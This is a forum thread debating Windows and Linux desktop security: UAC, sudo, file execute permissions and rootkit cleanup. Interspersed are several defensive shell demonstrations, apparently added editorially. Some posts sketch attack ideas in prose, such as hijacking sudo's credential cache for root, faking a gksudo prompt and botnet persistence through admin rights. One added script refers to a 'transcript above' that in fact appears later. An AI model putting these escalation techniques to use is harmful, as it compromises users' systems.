How are you planning on patching your OS without root ? Running software that binds to privileged ports ? Add devices to the system that require drivers ? Partition and/or format an external drive ? Etc, etc.
windows? I have to write to that abortion called the registry that is in the system folder.
You mean the transactional database with per-user permissions ?
Oops install software? I need to write to system and system32.
No, you don't. Certain applications might require it, but it's not an OS issue.
Look I got me a open door into the system...
No, you don't. Create and modify are different things.
Seriously, can we put this to rest? Compare the number of Linux servers and Windows servers on the web and tell me again that that argument holds water.
Can you provide the numbers so we can compare ?
Further, servers are not end user desktops. They represent two _distinctly_ different risk profiles.
I have yet to see a Windows machine stay clean indefinitely, however, no matter how conscientious or skilled the admin.
I've been running Windows NT (2k, XP, etc) on multiple home PCs for 15 years. I've never had a piece of malware on any system.
Isn't the iPhone environment the closest to this that we have in a mainstream computing environment?
Heh. It's easy; I've done it myself. In fact, it's easier than using Windows, which has the most difficult UI in the industry, especially since it's constantly changing.
By that implied standard, which UI is _not_ "constantly changing" ?
But that's all irrelevant, because computer security has absolutely nothing to do with sales. It's determined by ad budgets.
The single biggest factor in "security" (and I assume from your comment you are using the word in the context of outcomes, not capabilities) is end user behaviour. Nothing else even comes close.
Building them a secure system is more expensive than not bothering with security, and it wouldn't increase sales past the current 90%, so why should MS bother?
But now you're using "security" in a reference to capabilities. So, what security _capabilities_ are lacking in Windows, both compared to the alternatives and in an absolute sense ?
Well, several dialogs on Linux optionally remember the root password. Synaptic, e.g., has one like that on my Debian box. I don't think that should be an option, so *I* never select it. (Granted, Synaptic isn't the same as a browser, but it could authorize a new repository, and install software from it. Take a small bit of scripting, but it could easily turn a nearly harmless exploit into a massive one.)
Too many changes have been made to make using things easier without considering the security consequences. E.g., tar files shouldn't be able to unpack files with a "executable" marking. That should require a manually executed shell file...which itself wouldn't unpack with an executable marking.
But notice that this "security" causes a minimal decrease in usability. You've got to take an extra step to install the software. I.e., something equivalent to:
"su -c 'sh mark_executable.sh'" or "sh mark_executable.sh"
depending on the privileges required, though one could wrap a nice graphic around that without problems.
But storing passwords needed for execution is dangerous. Generally browsers remembering logon passwords is ok, but this shouldn't be done where the site might be significant. E.g., a slashdot logon/password combo can reasonably be stored by the browser. Your bank's logon/password is much less reasonable. (I won't even do internet banking, and I won't use debit cards. And the credit cards that I use online have a strictly limited credit limit.)
Despite that I feel that Linux is much safer than MSWind. Some bad choices have been made, but not as many. And If I want to use the internet securely, I can do it from an account that only has access to its own files. So far I haven't felt it's worth the bother, but it's readily doable.
I think we've pushed this "anyone can grow up to be president" thing too far.
echo echo Hello World > test.sh && sh test.sh
Would that still work if the partition was mounted as noexec?
*sigh* back to work...
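As an added example, not from any poster in this thread, the script below shows what the exec-bit argument comes down to: the execute bit is checked only by the kernel on execve(), so a file with mode 0644 cannot be run directly, while `sh file` or `. file` open it as data and need only the read bit. It also answers the noexec question: a noexec mount removes the execve() path for every file on that filesystem and changes nothing for the interpreter and sourcing cases (mounting needs root, so that part is left as a comment). Finally it shows why the `echo #!/bin/sh > test2.sh` in the transcript above never wrote a shebang: an unquoted `#` starts a comment, and the redirection goes with it. The file name pwned.sh and the temp directories are constructed for the demo.

```shell
#!/bin/sh
# Added example for this thread, not a poster's code. Shows that the execute
# bit is checked only by the kernel on execve(); an interpreter that opens
# the file as data needs just the read bit. File names are constructed.

demo_exec_bit() {
    dir=$(mktemp -d)
    script="$dir/pwned.sh"
    printf '%s\n' '#!/bin/sh' 'echo "ran as $(id -un)"' > "$script"
    chmod 0644 "$script"          # rw-r--r--: no execute bit anywhere

    # 1. Direct execution: execve() sees mode 0644 and fails with EACCES.
    if "$script" >/dev/null 2>&1; then direct=ran; else direct=denied; fi

    # 2. Passed to the interpreter: sh open()s and reads it; 0644 is enough.
    if sh "$script" >/dev/null 2>&1; then interp=ran; else interp=denied; fi

    # 3. Sourced into a subshell: again only read access is needed.
    if (. "$script") >/dev/null 2>&1; then sourced=ran; else sourced=denied; fi

    # A noexec mount blocks case 1 for every file on it and leaves cases 2
    # and 3 untouched (mounting needs root, so it is not exercised here).
    rm -rf "$dir"
    echo "$direct $interp $sourced"    # denied ran ran
}

# Why 'echo #!/bin/sh > test2.sh' in the thread did not do what was expected:
# an unquoted '#' begins a comment, so the shebang *and* the redirection are
# discarded and the file is never written. Quoting fixes it.
shebang_pitfall() {
    f=$(mktemp)
    {
        echo #!/bin/sh > "$f"     # everything from '#' on is a comment
    } >/dev/null
    unquoted=$(wc -c < "$f" | tr -d ' ')   # 0: the file is still empty
    echo '#!/bin/sh' > "$f"
    quoted=$(cut -c1-2 "$f")               # the literal '#!'
    rm -f "$f"
    echo "$unquoted $quoted"               # 0 #!
}

demo_exec_bit
shebang_pitfall
```

Swap `sh` for `perl`, `python3` or any other interpreter on the box and case 2 behaves the same way, which is the "dozens of scripting languages" point made elsewhere in the thread.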
So, suppose I'm the business end of a botnet. What does administrator access give me?
Your botnet client runs on boot, and much more quietly than under a user account. Under a user account, you have to start on login, and end communication when he logs off. Plus, with admin you can open FW ports, install other services, etc.
Unfortunately, when you unpack a tarball, the files unpack with the execute permission bits set (if they were set originally). And unpacking a tarball is the kind of thing it's reasonable to do.
I'll grant that this doesn't automatically execute the software, but it does make it executable. Then just clicking on an misleading file image can execute it. (And who knows that that file labeled "index.html" might do? Though *that* security hole may have been fixed. It doesn't seem to autoexecute anymore.)
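As an added example (not code from either poster), here is the behaviour described in the two comments above made concrete, together with a quarantined-extraction alternative of the kind the earlier comment asks for: extract, report which regular files arrived with an execute bit, strip it, and leave re-enabling to a deliberate step such as the proposed `sh mark_executable.sh`. The archive contents (install.sh, README) are constructed for the demo and safe_extract is a name chosen here, not a tar option.

```shell
#!/bin/sh
# Added example, not code from either poster. Shows that tar restores the
# execute bits an archive recorded, and one way to unpack without honouring
# them. Archive contents and the safe_extract name are constructed.

# Extract ARCHIVE into DEST, print every regular file that came out with an
# execute bit (for review), then strip all execute bits. Enabling them again
# becomes a deliberate step instead of a side effect of unpacking.
safe_extract() {
    archive=$1
    dest=$2
    mkdir -p "$dest"
    tar -xf "$archive" -C "$dest"
    find "$dest" -type f -perm -100 -print | sort
    find "$dest" -type f -exec chmod a-x {} +
}

demo_tar_exec_bits() {
    work=$(mktemp -d)
    mkdir "$work/src"
    printf '%s\n' '#!/bin/sh' 'echo installing' > "$work/src/install.sh"
    printf 'just text\n' > "$work/src/README"
    chmod 0755 "$work/src/install.sh"         # as a packager would ship it
    chmod 0644 "$work/src/README"
    tar -cf "$work/bundle.tar" -C "$work/src" .

    # Plain extraction: the archived mode is restored (a typical umask of 022
    # clears only group/other write, never execute), so install.sh is
    # executable the moment it lands and a click or ./install.sh runs it.
    mkdir "$work/plain"
    tar -xf "$work/bundle.tar" -C "$work/plain"
    plain=$(find "$work/plain" -type f -perm -100 | wc -l | tr -d ' ')

    # Quarantined extraction: one file reported, none left executable.
    flagged=$(safe_extract "$work/bundle.tar" "$work/safe" | wc -l | tr -d ' ')
    safe=$(find "$work/safe" -type f -perm -100 | wc -l | tr -d ' ')

    rm -rf "$work"
    echo "$plain $flagged $safe"    # 1 1 0
}

demo_tar_exec_bits
```

The review list is the useful part: a tarball of documentation or data that turns out to carry executable files is exactly the thing worth a second look before anything in it is marked executable again.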
You're wrong in saying administrator access is the basic difference between Linux and Windows. The most basic difference is in default file permissions. Windows ties read and execute together by default. You put an executable on a Windows system and it's immediately executable by anyone. That is not true with Linux. Executables are only executable by default if a system tool, such as apt-get, yum, etc... is used to install them. Otherwise, the user himself must add the execute permission to the file.
I set my system wide umask to 000 and leave it to my users (including root) to lock down each file. I feel it's more in the spirit of RMS's admin philosophy. I haven't had a problem yet. My real problem is with all of the "ls"es that keep getting copied into every directory.
There goes another one! Are they breeding?
Damn it!
So all a tank-jacker has to do is put a brick through the window?
You don't need gksudo unless your actually doing something "administrative" like changing system wide settings or installing system wide software.
Nor do you need UAC unless you're doing something administrative.
No non administrative app should ever require root so if you didn't do something where you would otherwise expect to need gksudo you can just assume the prompt is fake.
Of course. But Windows operates in an environment where millions of apps misbehave. This is the reality and so far all of the people who bash UAC are not living in the realm of reality. I'm still waiting for someone who thinks UAC sucks to propose user friendly alternative to UAC.
The reason UAC needs to be so clever is that day to day tasks often cause it to activate and you need to be able to tell the difference.
Day to day tasks - like what?? if you are talking about misbehaving programs that write to %programfiles%, then how the hell is UAC supposed to know that this is supposed to be a day to day task?
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
I've worked inside on things since windows 3.1
I've worked with security products over the same period.
I've worked with Users, and in terms of compliance, and in terms of business.
I've worked with and for and around vendors.
Today, we are multi generations of the base consumer OS later.
The real world security model is so broken as to be an actual joke.
The security models in use are also now so broken as to be an actual joke.
Application and vendor companies are still shipping products today, multi generations later in this consumer area that require the logged in user to run with administration rights when using the program.
Security products have been failing for several years. And there is no chance whatsoever that security products can mitigate and bulwark off computers against the fact that software is fundamentally flawed, but worse yet, globally end users are running the majority of applications, tools, utilities and processes with administrator rights.
Even with the onset of Vista and with Windows 7, the voluntary compliance in view of UAC is simply ignored. Most home users switch it off and blithely click click click, and the smarter ones would be utterly ignored when reporting to vendors to have corrective changes made to end software. With no punitive action being faced there is very little to persuade vendors and software producers to actually secure and improve their programs, APIs, frameworks, and features.
Security vendors rarely step forward to make demands in light of admin rights, and their whole industry is based on the equivalent in Pharma terms of dragons' penises and the magical effects thereof as a healing agent towards keeping clients secure.
Most security products are at best woefully inadequate, and in many cases have no idea malware and foreign code is running wild on systems they are 'protecting'. Years ago, they should have been driving the use of admin rights on the desktop away. But again, with no punitive penalty for failures, they can continue selling utterly flawed models and generations of products that are patently unable to do what they are supposedly designed to do.
I don't entirely blame them, but the failure to drive the admin rights issue is the fundamental flaw in this, along with faulty vendor products, and faulty third party software products.
Here are AdmV0rl0ns laws.
1. The model of software development has to change. And change fundamentally. For several decades - software has been built along very odd engineering lines. Companies are allowed almost a free hand in terms of punitive licensing, and in terms of licensing, and gain enormous protection from the state, and freedom of the state in terms of copyright and other protection.
In most cases, every single line of code written has been accompanied with a substantive 'If the world burns down because of this software, or because of anything this software does, then we cannot be held accountable, good luck.'.
This cannot continue. In the real world, no such engineering is acceptable. Bridges are not shoddy affairs put up and then handed over to the paying taxpayer, customer or business with a cast-iron guarantee that the bridge builder is exempt from 'everything'.
Consumers don't buy a car and then get forced by laws and licenses to sign over all their rights so that if the wheels fly off the car, the maker gets exemption from all responsibility.
In terms of OS development, The vendor has to be brought to account, and it has to develop and security test APIs and function to a level where the wheels do not fly off. And where security becomes a functional demand. And if this change cannot be gained by voluntary method, then the law needs changing so punitive damages are available to those who suffer failures from software.
It has to be remembered, many of these companies make millions, perhaps even billions, and yet avoid any examination of their products actual safety and engineering. Windows XP and its subsequent service packs w
We're all equal
The 70's called and they're offering timesharing again (although they are now calling it "cloud computing" as a new and improved name). Security was good, the core OS was secure and as a closed environment it wasn't prone to hackers. All you need is a TTY (preferably a ASR33), a dial up modem and you can call up your bank and get access to your account information.
The 60's have called have offered batch as an alternative.
For years, security experts, analysts and even users have been lamenting the state of *MS Windows* security. Viruses, spam, Trojans and rootkits have added up to create an ugly picture. But, the good news is that the MS Windows security battle may be over. The less-than-good news, however, is that we may have lost it. Jeremiah Grossman, CTO of WhiteHat Security, said Thursday that many organizations, particularly in the financial services industry, have gotten to the point of assuming that their customers' MS Windows desktops are compromised. And moving forward from that assumption, things don't get much prettier.
Wow, mono-culture turned out to be bad. Who'd a thunk it?
I call hogwash. How many Microsoft employees must be posting in this forum. The measure that matters is the real world. I've been working in a university I.T. dept, that's a LOT of machines spread amongst a huge breadth of user skill levels (our particular uni consists of roughly 40% OSX, 50% Windows (XP and 7) and 10% Fedora Linux (and yes, we do put end users on the Fedora boxes for classwork). I am yet to see a Linux or OSX machine get hit with a hijacked browser session.
I'd be very interested in a show of hands. Linux does have a decent share of the server market, and systems running it do get exploited (but my bet is that its very predominantly from exploits in sloppy PHP web apps and the like). But aside from that, how many of you out there have *ever* had malware get on to your Linux desktop and start hijacking your browser? My bet is very nearly zero. Windows is as secure as anything else? You may like to think that in principle it could be, but the experimental evidence strongly disagrees.
Censorship is the opposite of education. If neo-darwinism were defensible, people would not need to try and censor ID.
The flaw in these systems models is that developer tools and debuggers specifically are not built in to the system but rather are treated the same as any other application, which means any app can take control of any other app with only an "are you sure" screen in between at best.
So, when was gdb integrated into Linux kernel?
And what about Win32 debugging API?
Finally, an app cannot take control - as debugger or otherwise - of another app, unless it is as much or more privileged in security terms. It can request the OS to elevate, of course, prompting a UAC prompt. I'm not sure if that's what you mean by "are you sure screen", but if so, then how is Linux different? A Linux app can just as easily run gksudo (or whatever) to grant a process it controls root, and then use that process to do anything and everything up to and including loading kernel modules, which means full access to all processes.
It's not about profit, it's that windows gives people administrator by default (and you can still enable it in Windows 7).
Windows didn't do this since XP. And you can still enable root in Linux, too.
iexplore.exe is asking for administrator access. grant forever/don't ask again? Way to go, giving viruses admin access. It happens all the time.
There's no option to "don't ask again" in UAC prompts. You can set an app shortcut to "always run as administrator" in its properties, but that would just pop a UAC prompt automatically every time you start it. You can't skip that prompt, short of turning UAC off altogether (which amounts to running as root on Linux).
Aside from that, iexplore.exe won't ever ask to elevate by itself. If yours does, then you have a trojan already.
However, on this front, UAC doesn't do squat (especially when you can get around UAC).
Please explain how UAC is any less secure than sudo (and various graphical wrappers around that, as seen in Ubuntu etc).
As a user you NEVER HAVE TO GIVE THEM ROOT ACCESS. Ever! I can, as a user, install software, make changes, hell, I can change Xorg settings and never touch /etc. If I blow the hell out of things, I only blow the hell out of it for me.
Can you tell what distro you use that lets unprivileged users install software via the package manager?
Oh, and you do realize that users can install Windows software for themselves, if said software supports such mode of operation, right? Ever seen Chrome on Windows, or any ClickOnce app?
Windows? I have to write to that abortion called the registry that is in the system folder.
You don't need elevated permissions to access the HKEY_CURRENT_USER registry hive, which is where all per-user settings are.
In some ways I feel bad for Microsoft, because a lot of business-critical apps were designed in the Windows 3.1/95 era, where you could write to files anywhere on the drive and the OS wouldn't stop you. The problem now is that these software developers have yet to join the last decade and stop writing their files wherever they feel like it, so now Microsoft is stuck: if they break the apps, no one will upgrade, leaving things insecure; and if they leave things the same way they are now, things will be insecure. UAC is the middle road, where users get shown exactly what software is a problem but are still able to get work done.
Linux/*BSD/OSX all have the advantage here because on those OSes, apps that behave so badly won't even run in the first place, and that's why non-Windows people get so annoyed when people go on about how cool UAC is.
...But you run around with a weak password on your home ROUTER?
Typical, arrogant Slashdot. You deserve what you got.
And sometimes it doesn't take a rogue download!
My story:
I had a router that was probably 3-4 years old. It worked just fine, and did everything I needed it to. Except, of course, keep out hackers.
One day, I started being unable to get to certain websites. That list grew.
I kept checking all the PCs in the house for viruses or trojans or spyware, and all kept coming up clean.
I checked the routing, and I was being funneled through some random odd IP addresses.
Removed the errant links in the route, and things changed back to normal. Not a week or so later, and the same problem!
Went out and grabbed myself a new router, and the issues haven't come back since!
(I changed the default username and password, router's ip address, set up wireless password, disabled remote login—I thought I had done everything I could to secure the router from that type of thing... I guess I didn't protect it from design flaws it may have had, that I had no control over)
I imagine that the longer a router is out, the more time the hackers have to find the chinks in the armor of the router's security, and the easier it is to take control of them.
Especially since I rarely ever see many firmware updates for routers. I think I saw a few for the old one, but there was a span of a year or more where there was nothing.
You know, if a company knows that its routers can be or have been compromised, it'd be a good idea to let the public know (so they could then work to better protect themselves).
I wouldn't have even known if some websites hadn't stopped working! And I now more often check my routing, to make sure I'm not being redirected.
Let's ignore the API/ABI issue. Suppose a miracle happens, and every app developer decides to exclusively support native KeyKOS and EROS features.
How would it even work?
Without filenames, there is no reasonable way for the human to express things. I'm not going to type a UUID.
Without programs being able to scan directories, they can't offer nice File/Open dialog boxes. Consider the gimp, which provides a preview thumbnail.
Consider the common Edit/Insert operation. The app goes looking for a file to insert into a document.
Consider something like Open Office or Firefox. These apps have only one instance normally, even if you click the icon multiple times. This is for consistency (multiple instances editing a single file is bad) and for memory use reduction.
What would your GUI look like? How non-desktop must it be?
Linux/unix had the concept of su years before Microsoft thought of it; and it is a built in process to the operating system, not an afterthought.
Do you have a citation wrt your claims about rogue processes faking gksudo? "see: Ubuntu" is not enough. Windows systems can be attacked and compromised by code that injects into the Windows kernel itself through web browsers; I haven't seen any credible evidence yet that system processes in Linux can be compromised the same way. Userland, certainly, although exploits such as that are still very rare; but that doesn't compromise the system.
I do tech support for both windows and linux desktop systems, so I would be very interested in any information you can come up with.
SB
It's old. The more humans I meet, the more I like my cats. At least they are honest.
System access gives you the ability to hide your running processes from userland scans and deletion of your running files and boot hooks.
There are very few - if any (correct me if I'm wrong, please, with details, if those details are informative enough I'll even pay for the knowledge!) antivirus or antimalware programs that can detect and reliably remove rootkits. I certainly haven't found any that can do so, that's why I rely on combofix, the tdss variant removers, gmer, my intuition, and other tools to remove persistent infections from the increasing number of rootkit infected systems I deal with all the time as an independent home computer technician.
Userland malware isn't the real problem anymore - most antivirus and antimalware programs can deal with that (and I agree that most end users don't know to run it, even if they would know what to run; sadly, this is another of the bad things about Microsoft, education of end users as to the problems they will face, but Windows Defender, etc... hell, that's a whole 'nother topic). The real problem nowadays, that I'm seeing much more of, is rootkits that keep the spambot/malware alive and regenerate it when you kill it through other methods.
I have a pretty good toolkit, and enough knowledge, at this point to wipe this crap out on every system I encounter; but I know that it's going to get a lot worse. I already spend about thirty hours a week just trying to keep up on the latest removal tools after seeing a system last week with more than four rootkits on it, in addition to much other crap. (Cleaned it, to the best of my knowledge)
What got me, this year, is that for the first time since Klez I had one of my home systems infected. It was a TDSS variant (probably through a drive-by ad, near as I can tell); got it removed, but even though I've been doing tech support since before Windows existed, I couldn't trace the source of the infection back as well as I want to. Since then I've seen a lot of other attacks being tried, some of which failed on my system because they were executing invalid instructions (experimentation, I imagine); I know it's getting bad out there. I'm careful past the point of paranoia with my home systems.
I have customers who rely on me to keep their systems clean. I have to tell them that I can't be one hundred percent certain that I can guarantee they will be free of crap. Some of them I migrate to linux, Ubuntu or Fedora, if it works for them. I know there aren't any solid solutions, but when I see an article like this, I just have to say that I think the real problem is Microsoft's operating system.
I should probably make this a Slashdot Question. Busy... ;) and speaking of busy, I have three systems on the bench tonight I am paying lip service to...
SB
It's old. The more humans I meet, the more I like my cats. At least they are honest.
The main reason Windows gets nailed is that it's more profitable to write malware for Windows than for anything else. If Linux had the market share of Windows, it would have as much, or nearly as much, malware. This is one of the most common fallacies people spout during the Linux vs Windows debate. It's all about file permissions. Windows allows any program to be accessed by default, Linux does not. Sure an idiot user can screw up but most users have no idea how to assign root privilege to a file. Their ignorance is a sysadmin's bliss. The Network is a whole different story but on the desktop, the Linux file system and its permissions make it secure. In the end, it's user education that makes a machine secure, Linux just expands that education. Hence, a world of Windows users who click blindly and hope for the best.
Windows assumes you are an idiot...Linux demands proof.
The battle may be lost, but we don't have to lose the war! Let's step up our efforts. We can create a war on spam! It could be a misdemeanor to support the terrorist funding spam groups by allowing them your e-mail or the use of your machine! This could be supported by the government wiretapping efforts. It would help the economy by providing more free slave labor, and it would help stop the moral decline of the internet! Just say no to spam!
No, that's what MSNBC (Microsoft's news network at the time) tried to tell people, but it's not true, no matter how often you and other gullible people repeat it. The main reason that Windows security sucks is that it wasn't always present, and so Microsoft started a user culture that encouraged insecurity by default. Essentially, they compromised security and other best practice for a quick gain in customers. Ever since, it's been biting them in the ass, which seems quite just to me.
That's not true for Linux OR Windows, and you know it. At least, I hope you do.
The simplest way is to compile and install software using a prefix of your choice. Or, any recent kernel will let you run a complete distro in a container. You also have these:
http://hacktolive.org/wiki/Methods_for_Portable_Applications_on_Linux
For You, Blue.
Polaris:
http://www.hpl.hp.com/research/mmsl/projects/adv/polaris.html?jumpid=reg_R1002_USEN
Virus Safe Computing:
http://www.hpl.hp.com/news/2005/apr-jun/virussafe.html?jumpid=reg_R1002_USEN
Download:
Disclaimers:
Polaris uses a kernel driver to work around a bug that Microsoft claims is not security related. We believe this kernel driver is the reason Polaris does not work with Windows Vista. If you run without it, you are vulnerable to an attacker who mounts a Shatter attack after launching a process via the COM server. However, you're probably safe until Polaris becomes widely used.
This version is a first prototype, which means there are a number of things we didn't do and a number of bugs we didn't fix. For example, this version does not support linked files. However, almost 100 people have used Polaris, some of them for several years, and have reported few problems. A few of them have reported that Polaris saved them from some nasty viruses.
Polaris is NOT supported by HP. Send all questions to:
alan.karp at hp.com.
http://www.hpl.hp.com/personal/Alan_Karp/polaris/index.html?jumpid=reg_R1002_USEN
~hylas
garyk@lappy:~/scripts$ test2.sh
bash: /home/garyk/scripts/test2.sh: Permission denied
Which part of "sh test.sh" is so hard to understand? And yes, that works just fine on my Debian Testing box without the execute bit being set, just as expected...
np: Rndm - No Beginning (Dial 2010)
"I'm not anti-anything, I'm anti-everything, it fits better." - Sole
Can you see either solution being used by a casual user?
Linux/unix had the concept of su years before Microsoft thought of it; and it is a built in process to the operating system, not an afterthought.
I don't see how it was an afterthought. "runas" was introduced in Win2k, but the ability to impersonate other users existed in previous versions of the NT kernel.
Do you have a citation wrt your claims about rogue processes faking gksudo?
Why would I need to cite anything? gksudo is not complicated. It's a graphical sudo wrapper which uses standard gtk dialogs. Why you would think a process couldn't fake it is beyond me.
Windows systems can be attacked and compromised by code that injects into the Windows kernel itself through web browsers;
...if the browser process is running under the necessary privilege level. Otherwise, that cannot happen without a privilege escalation exploit.
I haven't seen any credible evidence yet that system processes in Linux can be compromised the same way. Userland, certainly, although exploits such as that are still very rare; but that doesn't compromise the system.
Where are you getting the idea that vulnerabilities in Linux userland programs are more rare than they are in Windows? There are tons of security updates every month for various *nix libraries and programs used in *nix OSs like Linux and BSD.
In regards to exploiting the system: with the default implementations of sudo in distros like Ubuntu and Debian (and I assume others), the root password is cached for a period of time after the user inputs it. A rogue process running with the user's credentials could sit in the background and wait for the user to invoke sudo, after which it could launch sudo itself and gain root.
Given desktop linux's obscurity, this is not really that big a threat, but it would surely be exploited if Linux had a sizable market share.
The solution to this problem is to turn off sudo password caching, or do what I prefer and enable the root account and use su instead of sudo.
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
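The credential cache discussed in the post above is controlled by the sudoers timestamp_timeout option. As an added example (not from this thread), the shell check below reads sudoers text and reports whether that cache is disabled, with a constructed stock policy beside its hardened form; a real system's policy lives in /etc/sudoers and /etc/sudoers.d/ and is edited with visudo.

```shell
#!/bin/sh
# Added example: report the sudo credential-cache lifetime configured in
# sudoers text read from stdin. Sample sudoers contents are constructed
# inline; on a real host you would feed it /etc/sudoers and /etc/sudoers.d/*.
# Assumes options are written name=value with no spaces around the '='.

# Print the effective timestamp_timeout (in minutes): the last Defaults
# line that sets it wins; prints "default" if no line sets it, meaning
# sudo's compiled-in value applies.
sudo_timestamp_timeout() {
    awk '
        /^[ \t]*Defaults/ {
            # A Defaults line may carry several comma-separated options
            n = split($0, parts, /[, \t]+/)
            for (i = 1; i <= n; i++)
                if (parts[i] ~ /^timestamp_timeout=/) {
                    split(parts[i], kv, "=")
                    val = kv[2]
                }
        }
        END { print (val == "" ? "default" : val) }
    '
}

# Classify the cache setting: 0 disables it (every sudo asks for a
# password), a negative value never expires it, anything else is minutes.
sudo_cache_rating() {
    t=$(sudo_timestamp_timeout)
    case "$t" in
        0)       echo "disabled" ;;
        -*)      echo "never expires" ;;
        default) echo "compiled-in default" ;;
        *)       echo "$t minutes" ;;
    esac
}

# Constructed sample policies: the stock layout that caches credentials,
# and the same policy with caching turned off.
WEAK_SUDOERS='Defaults env_reset
%sudo ALL=(ALL:ALL) ALL'
HARDENED_SUDOERS='Defaults env_reset, timestamp_timeout=0
%sudo ALL=(ALL:ALL) ALL'

printf '%s\n' "$WEAK_SUDOERS"     | sudo_cache_rating   # compiled-in default
printf '%s\n' "$HARDENED_SUDOERS" | sudo_cache_rating   # disabled
```

Turning the timeout to 0 removes the window the post describes at the cost of a password prompt on every sudo invocation; a negative value is the weakest setting, since the cached credential never expires.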
What about the HDfury? Sure, it's analog, but...
The other thing is, at least LCD panels use LVDS to connect to the controller board. Hijack the unencrypted LVDS signal.
Burn a Linux Live CD?
However, this still won't help against the user that browses... adult material first, gets himself (temporarily) infected and then moves on to do his banking.
Or the various drive-by and MitM attacks (owned router, e.g., which is incidentally what TFA was talking about).
Personally, I use a LiveCD for banking, which gets hooked up to the net directly through the DSL modem (PPPoE) without javascript or anything else enabled.
The kicker is that with this setup I am still in violation of the ToS of my bank, because there is no antivirus installed...
"always remember my decision for this application"? never heard of that? Way to go troll.
Well, when the parent is specifically discussing UAC, I think the better analogy would be
"Linux has better seatbelts!"
"Are they any more effective when a person who doesn't wear them is in the car?"
Casual user is a very different thing from unprivileged user. One is a skill level, the other is a (system) authorization level.
When I wrote "casual user", I meant just that. Supposedly, a casual user can install Ubuntu on his desktop these days without much trouble, and supposedly that will be "more secure". The claim in this thread is that (at least one of) the reason that is so is because the user doesn't have to elevate to install applications. Hence the question - do you see the proposed way of doing so (by ignoring the package manager, and manually compiling software with ./configure --prefix etc) being usable by casual users? And if not, then why is it touted as a security benefit, when it's not such for 95% of potential users, who are baited with it to switch?